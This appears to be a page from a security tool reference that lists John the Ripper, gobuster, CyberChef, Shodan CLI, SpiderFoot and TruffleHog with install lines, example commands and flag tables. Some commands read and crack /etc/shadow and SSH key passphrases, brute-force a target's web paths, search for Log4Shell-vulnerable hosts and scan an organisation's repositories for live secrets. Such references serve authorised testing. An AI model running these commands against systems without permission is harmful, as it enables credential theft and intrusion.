John the Ripper (Classic Password Cracker)
Active
Password
FREE
What It Does
Classic password cracker with auto hash detection. Best for Linux shadow files, ZIP/RAR/PDF/SSH key passwords with the Jumbo version.
Install
sudo apt install johnhttps://github.com/openwall/john (Jumbo version recommended)
Commands & Examples
// Auto crack — Auto-detect hash type and crack
john hash.txt
// With wordlist — Dictionary attack
john hash.txt --wordlist=rockyou.txt
// Show results — Display cracked passwords
john hash.txt --show
// Unshadow + crack — Linux shadow crack
unshadow /etc/passwd /etc/shadow > combined.txt && john combined.txt
// Specific format — Force hash format
john hash.txt --format=NT --wordlist=rockyou.txt
// Crack ZIP — ZIP file password
zip2john secret.zip > z.hash && john z.hash
// Crack SSH key — SSH private key passphrase
ssh2john id_rsa > s.hash && john s.hash --wordlist=rockyou.txt
// Crack RAR — RAR file password
rar2john secret.rar > r.hash && john r.hash
// Rules — Apply mangling rules
john hash.txt --wordlist=rockyou.txt --rules
Flag Reference
| Flag | Meaning & When to Use |
|---|---|
| --wordlist | Wordlist — Dictionary file |
| --format | Hash type — Force specific hash format: NT, md5crypt, bcrypt |
| --show | Show — Display cracked hashes |
| --incremental | Brute force — Try all char combinations |
| --rules | Rules — Apply word transformation rules |
| --restore | Restore session — Continue interrupted session |
References
Utilities
5 tools
26
gobuster (Directory/DNS/VHost Bruteforcer)
Active
Web
FREE
What It Does
Fast Go-based brute-forcer for web directories, DNS subdomains, and virtual hosts. Alternative to dirb/DirBuster.
Install
go install github.com/OJ/gobuster/v3@latestsudo apt install gobuster
Commands & Examples
// Directory scan — Brute directories
gobuster dir -u https://target.com -w /usr/share/wordlists/dirb/common.txt
// With extensions — Add file extensions
gobuster dir -u https://target.com -w common.txt -x php,txt,html,bak
// Skip SSL verify — -k = ignore SSL cert errors
gobuster dir -u https://target.com -w common.txt -k
// DNS subdomains — Enumerate DNS subdomains
gobuster dns -d target.com -w subdomains.txt
// VHost enum — Find virtual hosts
gobuster vhost -u https://target.com -w vhosts.txt
// Filter status — Only show these codes
gobuster dir -u https://target.com -w common.txt -s 200,302
// Threads — 50 concurrent threads
gobuster dir -u https://target.com -w common.txt -t 50
// With auth cookie — Authenticated scan
gobuster dir -u https://target.com -w common.txt -c 'session=abc'
Flag Reference
| Flag | Meaning & When to Use |
|---|---|
| dir / dns / vhost | Mode — Operating mode |
| -u | URL — Target URL |
| -w | Wordlist — Path to wordlist |
| -x | Extensions — File extensions to append |
| -t | Threads — Concurrent threads (default 10) |
| -s | Status filter — Only show matching status codes |
| -k | Skip SSL — Ignore invalid certificates |
| -c | Cookie — Set session cookie |
References
27
CyberChef (Cyber Swiss Army Knife)
Passive
Utilities
FREE
What It Does
Browser-based encoding, decoding, hashing, and analysis tool. 300+ operations. Essential for CTF, JWT decode, base64, XOR, AES decryption, and format conversion.
Install
https://gchq.github.io/CyberChef/ (web — no install)docker run -p 8000:8000 mpepping/cyberchef
Commands & Examples
// Base64 decode — Decode base64
Input: b64 string > Operations: From Base64 > BAKE
// JWT decode — Decode JWT without key
Input: JWT token > Operations: JWT Decode > BAKE
// Hash identify — Identify hash type
Input: hash string > Operations: Analyse Hash > BAKE
// URL decode — Percent-decode URL
Input: %41%42%43 > Operations: URL Decode > BAKE
// Hex to text — Hex decode
Input: hex > Operations: From Hex > BAKE
// Magic auto-detect — Auto-decode any encoding
Input: encoded data > Operations: Magic > BAKE
// AES decrypt — Decrypt AES ciphertext
Operations: AES Decrypt > enter key+IV > BAKE
Flag Reference
| Flag | Meaning & When to Use |
|---|---|
| BAKE | Run recipe — Execute the current operation chain |
| Magic | Auto-detect — Try all possible decodings automatically |
| Recipe | Chain — Combine multiple operations sequentially |
References
28
Shodan CLI (Internet Device Search Engine)
Passive
OSINT
FREE
What It Does
Search engine for internet-connected devices. Find exposed services, default credentials, open databases, and vulnerable versions passively.
Install
pip3 install shodan && shodan init YOUR_API_KEY
Commands & Examples
// Org search — All IPs for an organization
shodan search 'org:"Company Name"'
// Host info — Full details for an IP
shodan host 8.8.8.8
// CVE search — Find Log4Shell-vulnerable hosts
shodan search 'vuln:CVE-2021-44228'
// Exposed Mongo — Unauthenticated MongoDB
shodan search 'product:MongoDB' --fields ip_str,port,org
// Exposed Elastic — Exposed Elasticsearch
shodan search 'product:Elasticsearch port:9200'
// Download results — Save search results
shodan download results.json.gz 'org:Company'
// Count results — Count matching hosts
shodan count 'port:22 openssh'
// My IP — Get your external IP address
shodan myip
Flag Reference
| Flag | Meaning & When to Use |
|---|---|
| search | Search — Query Shodan with filters |
| host | Host lookup — Full info for specific IP |
| count | Count — Count results without downloading |
| download | Download — Save gzipped JSON results |
| --fields | Filter fields — Output only specified data fields |
| init | Setup — Set your API key |
References
29
SpiderFoot (Automated OSINT Platform)
Passive
OSINT
FREE
What It Does
Automated OSINT with 200+ modules and web UI. Aggregates intelligence from DNS, WHOIS, social media, breach databases, and dark web sources automatically.
Install
pip3 install spiderfootgit clone https://github.com/smicallef/spiderfoot && pip3 install -r requirements.txt
Commands & Examples
// Web UI — Launch web interface
python3 sf.py -l 127.0.0.1:5001
// CLI scan — CLI mode
python3 sfcli.py -s target.com -t INTERNET_NAME
// All modules — Run all 200+ modules
python3 sfcli.py -s target.com -m all
// Single module — Specific module
python3 sfcli.py -s email@target.com -t EMAILADDR -m sfp_haveibeenpwned
// HTML report — Generate report
python3 sfcli.py -s target.com -o report.html
Flag Reference
| Flag | Meaning & When to Use |
|---|---|
| -s | Seed target — Target to investigate |
| -t | Target type — INTERNET_NAME / EMAILADDR / IP_ADDRESS / PHONE_NUMBER |
| -m | Modules — Module names or 'all' |
| -o | Output — Output report file |
References
30
TruffleHog (Secret Scanner in Code)
Passive
OSINT
FREE
What It Does
Scans Git repositories, commits, and filesystems for leaked secrets: API keys, passwords, tokens, AWS keys. Integrates with CI/CD.
Install
pip3 install trufflehoggo install github.com/trufflesecurity/trufflehog/v3@latest
Commands & Examples
// Scan GitHub repo — Full commit history scan
trufflehog git https://github.com/target/repo
// Scan local repo — Scan cloned local repo
trufflehog git file://./local_repo
// Scan filesystem — Scan directory for secrets
trufflehog filesystem /path/to/scan
// Org-wide scan — Scan all repos in org
trufflehog github --org=target-org
// Only verified — Only show confirmed secrets
trufflehog git https://github.com/target/repo --only-verified
// JSON output — Machine-readable output
trufflehog git https://github.com/target/repo --json
Flag Reference
| Flag | Meaning & When to Use |
|---|---|
| git | Mode — Git repository scan |
| filesystem | Mode — Local file system scan |
| github | Mode — GitHub org/user scan |
| --only-verified | Filter — Show only confirmed active secrets |
| --json | JSON — Output in JSON format |
| --org | Org — Target GitHub organization |
References